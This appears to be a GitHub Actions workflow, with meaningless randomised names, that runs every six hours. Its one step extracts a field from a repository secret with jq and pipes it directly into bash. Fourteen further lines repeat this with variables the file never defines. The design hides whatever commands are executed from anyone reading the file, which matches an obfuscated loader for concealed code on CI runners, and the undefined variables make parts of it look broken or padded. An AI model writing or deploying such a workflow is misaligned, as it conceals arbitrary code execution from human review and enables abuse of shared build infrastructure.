name: dongqingcheng4657

on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dongqingcheng4657
        env:
          t7: ${{ secrets.t7 }}
        run: |
          echo $t7 | jq -r .lojkc9 | /bin/bash
          echo $mdzub02 | jq -r .a5349 | /bin/bash
          echo $zf9409 | jq -r .pcdbi8 | /bin/bash
          echo $kklf4 | jq -r .plqv72825 | /bin/bash
          echo $ykbg888 | jq -r .ofcqd4519 | /bin/bash
          echo $az53 | jq -r .awrv5161 | /bin/bash
          echo $zla41273 | jq -r .b94516 | /bin/bash
          echo $dx341 | jq -r .vr5 | /bin/bash
          echo $odng73490 | jq -r .oqeei28 | /bin/bash
          echo $p69720 | jq -r .hwlsd36562 | /bin/bash
          echo $hyv2424 | jq -r .eshyg6061 | /bin/bash
          echo $t21875 | jq -r .sr76 | /bin/bash
          echo $yosm0 | jq -r .nxqu254 | /bin/bash
          echo $skcrn10525 | jq -r .hjdn48273 | /bin/bash
          echo $e24642 | jq -r .wh396 | /bin/bash

